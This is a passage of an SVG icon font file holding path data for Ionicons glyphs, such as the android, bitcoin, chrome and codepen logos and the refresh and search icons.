c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32zM351 88c20 -11 33 -32 33 -56c0 -35 -29 -64 -64 -64s-64 29 -64 64c0 23 12 44 31 55v156c0 16 -4 26 -11 33c-10 9 -26 12 -52 12v-64l-96 96l96 96v-64c42 1 74 -8 96 -29c21 -19 31 -46 31 -80v-155z
M320 0c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32z" />
    <glyph glyph-name="ion-qr-scanner" unicode="&#xf346;" horiz-adv-x="416" 
d="M48 324v-68h-48v68c0 33 28 60 61 60h67v-48h-68c-7 0 -12 -5 -12 -12zM356 384c33 0 60 -27 60 -60v-68h-48v68c0 7 -6 12 -13 12h-67v48h68zM368 61v67h48v-67c0 -33 -27 -61 -60 -61h-68v49h68c7 0 12 5 12 12zM60 49h68v-49h-67c-33 0 -61 28 -61 61v67h48v-67
c0 -7 5 -12 12 -12z" />
    <glyph glyph-name="ion-quote" unicode="&#xf347;" horiz-adv-x="384" 
d="M128 384c-41 0 -73 -11 -95 -33s-33 -54 -33 -95v-256h160v256h-96c0 23 5 39 15 49s26 15 49 15zM352 384c-41 0 -73 -11 -95 -33s-33 -54 -33 -95v-256h160v256h-96c0 23 5 39 15 49s26 15 49 15z" />
    <glyph glyph-name="ion-radio-waves" unicode="&#xf2ac;" 
d="M160 192c0 43 21 64 64 64s64 -21 64 -64s-21 -64 -64 -64s-64 21 -64 64zM112 192c0 -18 5 -35 13 -50s19 -28 33 -37l-23 -25c-6 5 -13 10 -18 16c-25 26 -37 59 -37 96s12 70 37 96c5 6 12 11 18 16l23 -25c-14 -9 -25 -22 -33 -37s-13 -32 -13 -50zM336 192
c0 18 -5 35 -13 50s-19 28 -33 37l23 25c6 -5 13 -10 18 -16c25 -26 37 -59 37 -96s-12 -70 -37 -96c-5 -6 -12 -11 -18 -16l-23 25c14 9 25 22 33 37s13 32 13 50zM32 192c0 -27 6 -53 17 -77s27 -43 47 -59l-23 -24c-6 5 -12 10 -17 16c-18 19 -31 41 -41 65
c-10 25 -15 51 -15 79s5 54 15 79c10 24 23 46 41 65c5 6 11 11 17 16l23 -24c-10 -8 -18 -17 -26 -27s-14 -21 -20 -32s-10 -24 -13 -37s-5 -26 -5 -40zM416 192c0 27 -6 53 -17 77s-27 43 -47 59l23 24c6 -5 12 -10 17 -16c18 -19 31 -41 41 -65c10 -25 15 -51 15 -79
s-5 -54 -15 -79c-10 -24 -23 -46 -41 -65c-4 -5 -10 -10 -17 -16l-23 24c20 16 36 35 47 59s17 50 17 77z" />
    <glyph glyph-name="ion-record" unicode="&#xf21b;" horiz-adv-x="416" 
d="M208 -16c-115 0 -208 93 -208 208s93 208 208 208s208 -93 208 -208s-93 -208 -208 -208z" />
    <glyph glyph-name="ion-refresh" unicode="&#xf21c;" 
d="M352 96l-104 112h74c-7 65 -64 112 -130 112c-71 0 -128 -57 -128 -128s57 -128 128 -128c28 0 53 8 75 24l6 5l43 -46l-7 -6c-34 -26 -74 -41 -117 -41c-91 0 -167 64 -187 149v0c0 1 -1 2 -1 3v1v2s-1 2 -1 3v1c0 1 -1 3 -1 4v0c-1 6 -2 13 -2 19v1v4v5v5v4v1
c0 6 1 13 2 19v0c0 1 1 3 1 4v1c0 1 1 1 1 2v3v1c0 1 1 2 1 3v0c20 85 96 149 187 149v0v0c11 0 21 -1 31 -3h2h2c57 -10 106 -47 133 -96c13 -23 21 -49 23 -77h65z" />
    <glyph glyph-name="ion-reply-all" unicode="&#xf21d;" horiz-adv-x="416" 
d="M257 256c153 0 159 -208 159 -208c-51 93 -91 102 -159 102v-92l-152 134l152 144v-80zM0 192l144 136v-57l-82 -79l82 -68v-58z" />
    <glyph glyph-name="ion-reply" unicode="&#xf21e;" horiz-adv-x="384" 
d="M384 48c-53 93 -122 102 -224 102v-92l-160 134l160 144v-80c187 0 224 -208 224 -208z" />
    <glyph glyph-name="ion-ribbon-a" unicode="&#xf348;" horiz-adv-x="352" 
d="M272 416l80 -96l-64 -134c-24 30 -59 49 -99 53zM80 416l83 -177c-40 -4 -75 -23 -99 -53l-64 134zM189 416h67l-53 -112h-27h-27l-53 112h80h13zM176 224c71 0 128 -57 128 -128s-57 -128 -128 -128s-128 57 -128 128s57 128 128 128zM176 0c53 0 96 43 96 96
s-43 96 -96 96s-96 -43 -96 -96s43 -96 96 -96zM176 184c49 0 88 -39 88 -88s-39 -88 -88 -88s-88 39 -88 88s39 88 88 88z" />
    <glyph glyph-name="ion-ribbon-b" unicode="&#xf349;" horiz-adv-x="384" 
d="M192 376c49 0 88 -39 88 -88s-39 -88 -88 -88s-88 39 -88 88s39 88 88 88zM192 416c71 0 128 -57 128 -128s-57 -128 -128 -128s-128 57 -128 128s57 128 128 128zM192 192c53 0 96 43 96 96s-43 96 -96 96s-96 -43 -96 -96s43 -96 96 -96zM83 194c26 -30 65 -50 109 -50
c12 0 23 1 34 4l-34 -74l-48 -106l-48 80h-96zM301 194l83 -146h-96l-48 -80l-40 88l45 98c22 9 41 23 56 40z" />
    <glyph glyph-name="ion-sad-outline" unicode="&#xf4d7;" 
d="M367 164c3 -9 -2 -17 -11 -19c-3 -1 -7 0 -10 1c-5 2 -9 5 -11 10s-4 12 -13 15s-14 0 -19 -3c-4 -3 -10 -3 -15 -1c-3 1 -7 3 -9 6c-6 8 -3 17 5 22c15 9 29 13 49 6s29 -21 34 -37zM165 195c8 -5 10 -14 4 -22c-2 -3 -6 -5 -9 -6c-5 -2 -11 -2 -15 1c-5 3 -10 6 -19 3
s-11 -10 -13 -15s-6 -8 -11 -10c-3 -1 -7 -2 -10 -1c-9 2 -14 10 -11 19c5 16 14 30 34 37s35 3 50 -6zM224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM360 56c36 36 56 85 56 136s-20 100 -56 136s-85 56 -136 56
s-100 -20 -136 -56s-56 -85 -56 -136s20 -100 56 -136s85 -56 136 -56s100 20 136 56zM317 89c5 -7 3 -17 -4 -22c-3 -2 -6 -3 -9 -3c-5 0 -10 3 -13 7c0 0 -19 25 -67 25s-67 -25 -67 -25c-3 -4 -8 -7 -13 -7c-3 0 -6 1 -9 3c-7 5 -9 15 -4 22c1 2 28 39 93 39
s92 -37 93 -39z" />
    <glyph glyph-name="ion-sad" unicode="&#xf34a;" 
d="M224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM113 156c2 5 4 12 13 15s14 0 19 -3c4 -3 10 -3 15 -1c3 1 7 3 9 6c6 8 4 17 -4 22c-15 9 -30 13 -50 6s-29 -21 -34 -37c-3 -9 2 -17 11 -19c3 -1 7 0 10 1c5 2 9 5 11 10z
M313 67c7 5 9 15 4 22c-1 2 -28 39 -93 39s-92 -37 -93 -39c-5 -7 -3 -17 4 -22c3 -2 6 -3 9 -3c5 0 10 3 13 7c0 0 19 25 67 25s67 -25 67 -25c3 -4 8 -7 13 -7c3 0 6 1 9 3zM356 145c9 2 14 10 11 19c-5 16 -14 30 -34 37s-34 3 -49 -6c-8 -5 -11 -14 -5 -22
c2 -3 6 -5 9 -6c5 -2 11 -2 15 1c5 3 10 6 19 3s11 -10 13 -15s6 -8 11 -10c3 -1 7 -2 10 -1z" />
    <glyph glyph-name="ion-scissors" unicode="&#xf34b;" horiz-adv-x="384" 
d="M341 332c-13 -33 -117 -172 -117 -172l-32 -32s-31 -13 -50 -43s-33 -71 -33 -71v0c-7 -26 -28 -46 -53 -46c-31 0 -56 29 -56 64s25 64 56 64c13 0 25 -5 34 -13c2 -1 3 -3 4 -4v0l2 -2c4 -4 7 -2 14 11c8 15 17 35 27 54s38 59 38 59l17 23l144 192
c23 -20 18 -51 5 -84zM56 0c15 0 28 14 28 32s-13 32 -28 32s-28 -14 -28 -32s13 -32 28 -32zM192 160c9 0 16 7 16 16s-7 16 -16 16s-16 -7 -16 -16s7 -16 16 -16zM143 183c-30 41 -90 125 -100 149c-13 33 -18 64 5 84l134 -178l-3 -4v0v0l-17 -23v-1v0
c-1 -1 -10 -13 -19 -27zM328 96c31 0 56 -29 56 -64s-25 -64 -56 -64c-25 0 -47 20 -54 46v0s-13 41 -32 71c-11 17 -26 28 -36 35l29 29l1 1h1c1 1 1 2 2 4c3 -4 5 -9 7 -12c10 -19 20 -39 28 -54c7 -13 10 -15 14 -11c1 1 0 1 1 2h1c1 1 2 3 4 4c9 8 21 13 34 13zM328 0
c15 0 28 14 28 32s-13 32 -28 32s-28 -14 -28 -32s13 -32 28 -32z" />
    <glyph glyph-name="ion-search" unicode="&#xf21f;" horiz-adv-x="384" 
d="M381 61c4 -4 4 -10 0 -14l-43 -44c-2 -2 -5 -3 -8 -3s-5 1 -7 3l-84 86c-25 -15 -52 -23 -80 -23c-87 0 -159 71 -159 159s72 159 159 159s158 -71 158 -159c0 -27 -7 -54 -21 -78zM159 322c-53 0 -97 -43 -97 -97s44 -97 97 -97s96 43 96 97s-43 97 -96 97z" />
    <glyph glyph-name="ion-settings" unicode="&#xf2ad;" horiz-adv-x="416" 
d="M402 310c10 -6 15 -25 14 -36c-1 -17 -7 -36 -25 -54c-1 -1 -2 -1 -3 -2c-26 -25 -62 -30 -94 -20c-1 1 -2 2 -4 2c-5 1 -10 0 -13 -4l-36 -39c52 -50 107 -96 107 -96c2 -2 2 -5 0 -7l-50 -51c-2 -2 -5 -2 -7 0c0 0 -44 55 -93 107l-92 -98c-14 -16 -40 -15 -55 0
c-15 16 -15 42 1 56l97 93l-12 12c-2 2 -3 7 -1 10l2 5c-25 26 -36 33 -56 32s-36 -13 -48 -28s-10 -52 -8 -62s-7 -6 -12 0c-9 10 -23 50 -6 93s42 69 48 75s16 15 24 21s21 -1 27 5c4 4 5 11 5 16l-4 4c-2 2 -2 5 0 7l31 31c2 2 5 2 7 0l50 -50c2 -2 2 -6 0 -8l-31 -31
c-2 -2 -5 -2 -7 0l-8 9c-7 0 -15 -5 -17 -10c-3 -6 -6 -21 -3 -33c3 -11 13 -20 36 -43l5 3c4 2 8 1 10 -1c0 0 1 -2 13 -14l38 37c4 3 5 7 4 13c0 2 0 4 -1 5c-10 33 -6 69 19 96l2 2c18 18 36 25 53 26c10 1 30 -5 35 -15l-48 -48l-2 -3l-1 -1c-1 -1 -1 -2 -1 -4
s0 -3 1 -5l2 -2l2 -2l41 -42l3 -3l1 -1c1 -1 2 -1 4 -1s3 0 4 1l2 1l2 3z" />
    <glyph glyph-name="ion-share" unicode="&#xf220;" horiz-adv-x="384" 
d="M288 70v59l38 31v-109c0 -11 -8 -19 -19 -19h-288c-11 0 -19 9 -19 19v218c0 11 8 19 19 19h120c-29 -18 -43 -38 -43 -38h-58v-180h250zM256 224c-84 0 -116 -24 -160 -96c0 0 5 164 160 164v60l128 -96l-128 -96v64z" />
    <glyph glyph-name="ion-shuffle" unicode="&#xf221;" 
d="M338 267c-52 0 -83 -43 -120 -92c-41 -55 -88 -120 -171 -120h-47v63h47c52 0 84 47 121 96c41 55 87 116 170 116h29v54l81 -81l-81 -84v48h-29zM121 230c-21 21 -42 35 -74 36c-34 1 -47 0 -47 0v63h47c48 0 83 -20 113 -48c-10 -12 -19 -24 -28 -36
c-4 -5 -7 -10 -11 -15zM367 118v47l81 -84l-81 -81v54h-29c-50 0 -87 23 -117 53c12 14 22 28 32 41c2 3 5 6 7 9c22 -24 46 -39 78 -39h29z" />
    <glyph glyph-name="ion-skip-backward" unicode="&#xf222;" horiz-adv-x="384" 
d="M12 352h8c7 0 12 -5 12 -12v-113l187 122c2 2 5 3 8 3c8 0 16 -7 16 -17v-63l118 78c2 2 5 2 8 2c8 0 15 -7 15 -17v-286c0 -10 -7 -17 -15 -17c-3 0 -5 1 -8 3l-118 78v-64c0 -10 -8 -17 -16 -17c-3 0 -5 1 -8 3l-187 122v-113c0 -7 -5 -12 -12 -12h-8
c-7 0 -12 5 -12 12v296c0 7 5 12 12 12z" />
    <glyph glyph-name="ion-skip-forward" unicode="&#xf223;" horiz-adv-x="384" 
d="M372 352c7 0 12 -5 12 -12v-296c0 -7 -5 -12 -12 -12h-8c-7 0 -12 5 -12 12v113l-187 -122c-3 -2 -5 -3 -8 -3c-8 0 -15 7 -15 17v64l-119 -78c-3 -2 -5 -3 -8 -3c-8 0 -15 7 -15 17v286c0 10 7 17 15 17c3 0 6 0 8 -2l119 -78v63c0 10 7 17 15 17c3 0 6 -1 8 -3
l187 -122v113c0 7 5 12 12 12h8z" />
    <glyph glyph-name="ion-social-android-outline" unicode="&#xf224;" horiz-adv-x="352" 
d="M272 240h-192v-60v-89h24h16v-15v-52c0 -4 4 -8 8 -8s8 4 8 8v52v15h17h49h15v-15v-52c0 -2 1 -4 3 -6h1v0c1 -1 2 -2 4 -2h1v0v0c4 0 7 4 7 8v52v15h17h22v89v60zM288 256v0v-76v-90c0 -7 -3 -15 -10 -15h-29v-51c0 -13 -10 -24 -23 -24v0h-1c-6 0 -11 2 -15 5
c-5 4 -9 11 -9 19v51h-49v-51c0 -13 -11 -24 -24 -24s-24 11 -24 24v51h-28c-7 0 -12 8 -12 15v90v76h224zM328 256c-4 0 -8 -4 -8 -8v-96c0 -4 4 -8 8 -8s8 4 8 8v96c0 4 -4 8 -8 8zM328 272v0c13 0 24 -11 24 -24v-96c0 -13 -11 -24 -24 -24s-24 11 -24 24v96
c0 13 11 24 24 24zM24 256c-4 0 -8 -4 -8 -8v-96c0 -4 4 -8 8 -8s8 4 8 8v96c0 4 -4 8 -8 8zM24 272v0c13 0 24 -11 24 -24v-96c0 -13 -11 -24 -24 -24s-24 11 -24 24v96c0 13 11 24 24 24zM175 354c-14 0 -27 -3 -38 -6l-10 -4c-28 -12 -40 -37 -44 -56h186
c-4 18 -15 43 -44 56l-10 4c-12 4 -25 6 -39 6v0v0h-1zM105 384v0h1l19 -23c13 5 30 9 50 9h1c20 0 36 -4 50 -9l20 23v0s1 -1 2 -1c1 -1 2 -3 2 -3l-19 -22c48 -21 56 -71 57 -86h-224c1 15 9 66 57 87l-19 22c0 1 1 1 2 2zM127 309c-7 0 -14 6 -14 13s6 14 14 14
c7 0 13 -7 13 -14s-5 -13 -13 -13zM225 309c-7 0 -13 6 -13 13s5 14 13 14c7 0 13 -7 13 -14s-6 -13 -13 -13z" />
    <glyph glyph-name="ion-social-android" unicode="&#xf225;" horiz-adv-x="352" 
d="M64 180v76h224v-76v-90c0 -7 -4 -14 -11 -14h-28v-52c0 -13 -11 -24 -24 -24v0h-1c-6 0 -10 2 -14 5c-5 4 -9 11 -9 19v52h-49v-52c0 -13 -11 -24 -24 -24s-24 11 -24 24v52h-29c-7 0 -11 7 -11 14v90zM328 272c13 0 24 -11 24 -24v-96c0 -13 -11 -24 -24 -24
s-24 11 -24 24v96c0 13 11 24 24 24zM24 272c13 0 24 -11 24 -24v-96c0 -13 -11 -24 -24 -24s-24 11 -24 24v96c0 13 11 24 24 24zM231 359c48 -21 56 -72 57 -87h-224c1 15 8 66 56 87l-18 22c0 1 0 1 1 2s3 1 3 1l19 -23c14 5 31 9 51 9s36 -4 50 -9l20 23c0 1 1 0 2 -1
l2 -2zM127 309c8 0 13 6 13 13s-6 14 -13 14c-8 0 -14 -7 -14 -14s7 -13 14 -13zM225 309c7 0 14 6 14 13s-7 14 -14 14c-8 0 -13 -7 -13 -14s6 -13 13 -13z" />
    <glyph glyph-name="ion-social-angular-outline" unicode="&#xf4d8;" 
d="M224 384l-188 -69l39 -230l149 -80l149 80l39 230zM224 416v0l224 -80l-46 -272l-178 -96l-178 96l-46 272zM312 96l-27 56h-122l-27 -56h-40l128 280l128 -280h-40zM182 192h84l-42 89z" />
    <glyph glyph-name="ion-social-angular" unicode="&#xf4d9;" 
d="M182 192l42 89l42 -89h-84zM224 416l224 -80l-46 -272l-178 -96l-178 96l-46 272zM312 96h40l-128 280l-128 -280h40l27 56h122z" />
    <glyph glyph-name="ion-social-apple-outline" unicode="&#xf226;" horiz-adv-x="320" 
d="M238 278c-15 0 -26 -4 -37 -8c-10 -4 -21 -8 -35 -8s-25 4 -37 8c-11 4 -22 8 -34 8c-11 0 -23 -3 -34 -10c-12 -7 -23 -18 -31 -31c-12 -18 -16 -47 -13 -77c3 -34 16 -69 35 -99c13 -21 30 -45 50 -45h1c8 0 13 3 20 6c10 5 23 10 44 10v0c21 0 34 -5 44 -10
c7 -3 12 -6 19 -6v0c22 0 44 35 52 48c8 12 12 20 17 31c-12 7 -22 16 -30 28c-10 15 -17 33 -18 52c-1 18 2 37 10 53c6 12 14 22 24 30c-14 13 -31 20 -47 20zM238 294v0c25 0 52 -14 71 -39c-63 -36 -53 -128 11 -153c-9 -20 -13 -28 -24 -46c-16 -25 -37 -56 -65 -56h-1
c-24 0 -31 16 -63 16v0c-33 0 -40 -16 -64 -16h-1c-28 0 -48 28 -64 53c-44 69 -48 150 -21 193c19 30 50 48 78 48c29 0 47 -16 71 -16c23 0 38 16 72 16zM214 364c-11 -5 -21 -13 -28 -22c-4 -5 -9 -13 -13 -23c-1 -3 -2 -6 -2 -9c11 4 21 11 28 21c4 5 12 18 15 33z
M230 384v0c3 -23 -6 -46 -18 -62c-13 -17 -35 -30 -56 -30h-1c-4 22 6 44 18 60c14 17 37 31 57 32z" />
    <glyph glyph-name="ion-social-apple" unicode="&#xf227;" horiz-adv-x="320" 
d="M238 294v0c25 0 52 -14 71 -39c-63 -36 -53 -128 11 -153c-9 -20 -13 -28 -24 -46c-16 -25 -37 -56 -65 -56h-1c-24 0 -31 16 -63 16v0c-33 0 -40 -16 -64 -16h-1c-28 0 -48 28 -64 53c-44 69 -48 150 -21 193c19 30 50 48 78 48c29 0 47 -16 71 -16c23 0 38 16 72 16z
M230 384v0c3 -23 -6 -46 -18 -62c-13 -17 -35 -30 -56 -30h-1c-4 22 6 44 18 60c14 17 37 31 57 32z" />
    <glyph glyph-name="ion-social-bitcoin-outline" unicode="&#xf2ae;" horiz-adv-x="320" 
d="M184 400h-8v-48v-16h-16h-32h-16v16v48h-9v-48v-16h-16h-72v-16h13c11 0 19 0 25 -3s10 -7 13 -13s3 -8 3 -20v-178c0 -11 0 -18 -3 -24v-1c-1 -3 -4 -10 -12 -14h-1c-5 -3 -8 -3 -17 -3h-13l-3 -16h67h16v-16v-48h9v48v16h16h32h16v-16v-48h8v49v16h15c23 1 41 5 55 10
c16 6 28 15 37 26c8 11 12 29 13 42c1 14 -1 29 -4 36s-8 16 -21 23c-7 4 -14 6 -21 8l-46 11l43 19c4 2 7 4 12 9c6 5 9 12 11 16c2 5 4 13 3 22c-1 17 -4 29 -10 37c-7 9 -17 16 -31 21c-12 5 -24 7 -41 8l-15 1v15v47zM200 416v0v-63c20 -1 32 -4 45 -9
c16 -6 29 -15 38 -27s12 -28 13 -45c1 -10 0 -20 -3 -28s-8 -16 -16 -23c-6 -6 -11 -9 -16 -11c9 -2 17 -6 25 -10c15 -8 24 -18 29 -30c4 -10 6 -30 5 -44c-1 -16 -6 -37 -16 -51c-11 -14 -26 -24 -45 -31c-15 -6 -33 -10 -59 -11v-65h-40v64h-32v-64h-41v64h-87l8 48h28
c9 0 8 1 11 2s4 3 5 6s1 9 1 18v178c0 9 0 10 -1 12s-3 4 -6 6s-9 2 -18 2h-28v48h87v64h41v-64h32v64h40zM160 298v-74h-32v74h32zM160 176v0v-90h-32v90h32zM200 294v0c6 -2 10 -7 14 -12c4 -6 6 -13 6 -21s-2 -15 -7 -21c-4 -5 -7 -9 -13 -12v66zM200 174v0
c5 -1 8 -1 12 -3c8 -3 14 -7 19 -13s8 -15 8 -24c0 -11 -2 -19 -10 -26s-13 -11 -23 -15c-2 -1 -4 0 -6 -1v82z" />
    <glyph glyph-name="ion-social-bitcoin" unicode="&#xf2af;" horiz-adv-x="320" 
d="M314 169c4 -10 7 -30 6 -44c-1 -16 -5 -37 -16 -51s-26 -24 -45 -31c-15 -6 -33 -10 -59 -11v-64h-40v64h-32v-64h-41v64h-87l9 48h26c9 0 9 0 12 1s4 4 5 7s2 8 2 17v173c0 9 -1 16 -2 18s-3 4 -6 6s-9 2 -18 2h-28v48h87v64h41v-64h32v64h40v-64c20 -1 33 -4 46 -9
c16 -6 28 -15 37 -27s12 -28 13 -45c1 -10 0 -20 -3 -28c-2 -8 -8 -16 -16 -23c-6 -6 -11 -9 -16 -11c9 -2 17 -6 25 -10c15 -8 23 -18 28 -30zM128 298v-74h32v74h-32zM128 86h32v90h-32v-90zM200 294v-66c6 3 9 7 13 12c5 6 7 12 7 20s-2 15 -6 21c-4 5 -8 11 -14 13z
M229 107c8 7 10 15 10 26c0 9 -3 19 -8 25s-12 10 -20 13c-4 2 -6 2 -11 3v-82c2 0 5 1 7 2c10 4 14 6 22 13z" />
    <glyph glyph-name="ion-social-buffer-outline" unicode="&#xf228;" horiz-adv-x="384" 
d="M7 284c-9 4 -9 11 0 15l169 82c4 2 10 3 16 3s12 -1 16 -3l169 -82c9 -4 9 -11 0 -15l-169 -82c-4 -2 -10 -3 -16 -3s-12 1 -16 3zM183 366l-156 -75l156 -75c2 -1 5 -1 9 -1s7 0 9 1l156 75l-156 75c-2 1 -5 2 -9 2s-7 -1 -9 -2zM377 200c9 -4 9 -12 0 -16l-169 -81
c-4 -2 -10 -4 -16 -4s-12 2 -16 4l-169 81c-9 4 -9 12 0 16c0 0 27 13 33 16c5 3 7 3 13 0s123 -60 123 -60c4 -2 10 -3 16 -3s12 1 16 3c0 0 121 59 125 61s5 2 9 0s35 -17 35 -17zM201 117l156 75l-19 9l-123 -59c-6 -3 -15 -5 -23 -5s-17 2 -23 5l-123 59l-19 -9l156 -75
c2 -1 5 -2 9 -2s7 1 9 2zM377 100c9 -4 9 -11 0 -15l-169 -82c-4 -2 -10 -3 -16 -3s-12 1 -16 3l-169 82c-9 4 -9 11 0 15c0 0 27 14 33 17c5 3 7 2 13 -1s123 -59 123 -59c4 -2 10 -3 16 -3s12 1 16 3c0 0 121 58 125 60s5 2 9 0s35 -17 35 -17zM201 18l156 75l-19 9
l-123 -60c-6 -3 -15 -4 -23 -4s-17 1 -23 4l-123 60l-19 -9l156 -75c2 -1 5 -2 9 -2s7 1 9 2z" />
    <glyph glyph-name="ion-social-buffer" unicode="&#xf229;" horiz-adv-x="384" 
d="M7 284c-9 4 -9 11 0 15l169 82c4 2 10 3 16 3s12 -1 16 -3l169 -82c9 -4 9 -11 0 -15l-169 -82c-4 -2 -10 -3 -16 -3s-12 1 -16 3zM377 200c9 -4 9 -12 0 -16l-169 -81c-4 -2 -10 -4 -16 -4s-12 2 -16 4l-169 81c-9 4 -9 12 0 16c0 0 27 13 33 16c5 3 7 3 13 0
s123 -60 123 -60c4 -2 10 -3 16 -3s12 1 16 3c0 0 121 59 125 61s5 2 9 0s35 -17 35 -17zM377 100c9 -4 9 -11 0 -15l-169 -82c-4 -2 -10 -3 -16 -3s-12 1 -16 3l-169 82c-9 4 -9 11 0 15c0 0 27 14 33 17c5 3 7 2 13 -1s123 -59 123 -59c4 -2 10 -3 16 -3s12 1 16 3
c0 0 121 58 125 60s5 2 9 0s35 -17 35 -17z" />
    <glyph glyph-name="ion-social-chrome-outline" unicode="&#xf4da;" 
d="M224 416c123 0 224 -101 224 -224s-101 -224 -224 -224s-224 101 -224 224s101 224 224 224zM224 371c-57 0 -109 -27 -141 -68l54 -93c8 40 43 72 87 72h155c-30 54 -89 89 -155 89zM291 192c0 37 -30 67 -67 67s-67 -30 -67 -67s30 -67 67 -67s67 30 67 67zM45 192
c0 -91 67 -166 154 -177l54 93c-9 -3 -19 -6 -29 -6c-34 0 -61 18 -77 45v0l-78 135c-16 -27 -24 -58 -24 -90zM224 13c99 0 179 80 179 179c0 24 -4 46 -13 67h-108c19 -17 32 -40 32 -67c0 -17 -5 -32 -13 -45v0z" />
    <glyph glyph-name="ion-social-chrome" unicode="&#xf4db;" 
d="M157 192c0 37 30 67 67 67s67 -30 67 -67s-30 -67 -67 -67s-67 30 -67 67zM445 230c2 -12 3 -25 3 -38c0 -106 -74 -195 -174 -218c-10 -2 -20 -4 -30 -5c-7 -1 -13 -1 -20 -1c-8 0 -17 0 -25 1v0v0v0v1l102 177c8 13 13 28 13 45c0 27 -13 50 -32 67h156
c3 -9 5 -19 7 -29v0c-2 10 -4 20 -7 29v0c3 -9 5 -19 7 -29v0zM224 103c10 0 20 2 29 5l-78 -135v0c-42 9 -79 30 -108 59c-42 41 -67 97 -67 160c0 31 6 61 18 88c7 16 16 31 26 45v0l103 -178c16 -27 43 -44 77 -44zM59 343v0v1c24 26 55 47 90 59c23 8 49 13 75 13
c73 0 138 -36 179 -90h1c10 -14 18 -29 25 -44v0c-7 15 -15 30 -25 44h-1c10 -14 19 -29 26 -44h-205c-44 0 -79 -32 -87 -72z" />
    <glyph glyph-name="ion-social-codepen-outline" unicode="&#xf4dc;" 
d="M356 244c5 -3 7 -6 7 -12v-81c0 -6 -3 -10 -8 -13c-41 -27 -82 -55 -123 -82c-6 -4 -11 -4 -17 0c-41 27 -81 55 -122 82c-5 3 -8 7 -8 13v80c0 6 3 11 8 14c41 27 81 54 122 81c6 4 11 4 17 0c41 -27 83 -55 124 -82zM236 296v-54c0 -1 1 -2 2 -3c16 -11 31 -21 47 -32
c1 -1 3 -1 4 0l40 26zM212 295c0 0 -62 -41 -93 -62c14 -9 27 -17 40 -26c1 -1 3 -1 4 0c15 10 31 21 46 31c1 1 3 4 3 6v51zM109 211v-40l30 20zM212 87v53c0 1 -2 3 -3 4c-15 10 -31 21 -46 31c-2 1 -3 1 -5 0l-39 -26c31 -21 93 -62 93 -62zM227 165l39 26s-34 23 -40 27
c-1 1 -4 0 -5 -1c-5 -3 -9 -6 -14 -9c-8 -6 -25 -17 -25 -17l39 -26c2 -1 4 -1 6 0zM236 87l93 62l-38 26c-2 2 -5 2 -7 0c-15 -10 -30 -21 -45 -31c-2 -2 -3 -3 -3 -6v-51zM338 171v40l-30 -20zM224 384c-51 0 -100 -20 -136 -56s-56 -85 -56 -136s20 -100 56 -136
s85 -56 136 -56s100 20 136 56s56 85 56 136s-20 100 -56 136s-85 56 -136 56zM224 416v0c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224z" />
    <glyph glyph-name="ion-social-codepen" unicode="&#xf4dd;" 
d="M209 144c1 -1 3 -3 3 -4v-53s-62 41 -93 62l39 26c2 1 3 1 5 0c15 -10 31 -21 46 -31zM163 207c-1 -1 -3 -1 -4 0c-13 9 -26 17 -40 26c31 21 93 62 93 62v-51c0 -2 -2 -5 -3 -6c-15 -10 -31 -21 -46 -31zM238 239c-1 1 -2 2 -2 3v54l93 -63l-40 -26c-1 -1 -3 -1 -4 0
c-16 11 -31 21 -47 32zM226 218c6 -4 40 -27 40 -27l-39 -26c-2 -1 -4 -1 -6 0l-39 26s17 11 25 17c5 3 9 6 14 9c1 1 4 2 5 1zM109 211l30 -20l-30 -20v40zM224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM363 151v81
c0 6 -2 9 -7 12c-41 27 -83 55 -124 82c-6 4 -11 4 -17 0c-41 -27 -81 -54 -122 -81c-5 -3 -8 -8 -8 -14v-80c0 -6 3 -10 8 -13c41 -27 81 -55 122 -82c6 -4 11 -4 17 0c41 27 82 55 123 82c5 3 8 7 8 13zM284 175c2 2 5 2 7 0l38 -26l-93 -62v51c0 3 1 4 3 6
c15 10 30 21 45 31zM338 171l-30 20l30 20v-40z" />
    <glyph glyph-name="ion-social-css3-outline" unicode="&#xf4de;" horiz-adv-x="384" 
d="M291 81l-99 -28l-98 28l-7 78h48l4 -40l53 -15v0v0l54 15l5 64h-112l-4 50h121l4 51h-184l-4 49h241zM0 416h384l-35 -403l-157 -45l-157 45zM319 37l30 347h-314l30 -347l127 -36z" />
    <glyph glyph-name="ion-social-css3" unicode="&#xf4df;" horiz-adv-x="384" 
d="M192 109v0zM0 416h384l-35 -403l-157 -45l-157 45zM291 81l22 252h-241l4 -49h184l-4 -51h-121l4 -50h112l-5 -64l-54 -15v0v0l-53 15l-4 40h-48l7 -78l98 -28z" />
    <glyph glyph-name="ion-social-designernews-outline" unicode="&#xf22a;" 
d="M259 302v-53l-65 103zM0 188zM297 352l151 -119v-201h-248l-200 156h63c46 0 77 33 77 82c0 20 -5 37 -15 51l-3 3l37 -29v-107h41l-2 98l63 -98h36v84v80zM432 48v178l-119 92v1v-47v-83v-17h-15h-37h-9l-4 8l-33 50l1 -42v-16h-16h-41h-16v16v29c-3 -6 -7 -12 -12 -17
c-8 -9 -18 -16 -30 -21s-24 -7 -38 -7h-16l159 -124h226zM59 298h-1h-3v-57h4c8 0 13 2 17 6c5 6 6 15 6 22c0 26 -12 29 -23 29zM59 314v0c25 0 39 -16 39 -45c0 -28 -14 -44 -40 -44h-19v89h20z" />
    <glyph glyph-name="ion-social-designernews" unicode="&#xf22b;" 
d="M258 303l1 -53l-64 102zM297 352l151 -118v-202h-248l-200 157v0h63c46 0 77 33 77 82c0 20 -5 37 -15 51l-3 3l37 -29v-107h40l-2 99l64 -99h36v83v80zM98 270c0 -28 -14 -44 -40 -44h-19v89h19c26 0 40 -16 40 -45z" />
    <glyph glyph-name="ion-social-dribbble-outline" unicode="&#xf22c;" horiz-adv-x="384" 
d="M192 384c106 0 192 -86 192 -192s-86 -192 -192 -192s-192 86 -192 192s86 192 192 192zM314 296c-17 -25 -47 -47 -85 -64c5 -10 9 -20 13 -31c33 3 75 4 110 2c-2 35 -16 68 -38 93zM192 352c-14 0 -26 -2 -39 -5c23 -23 43 -53 62 -87c34 14 62 33 79 55
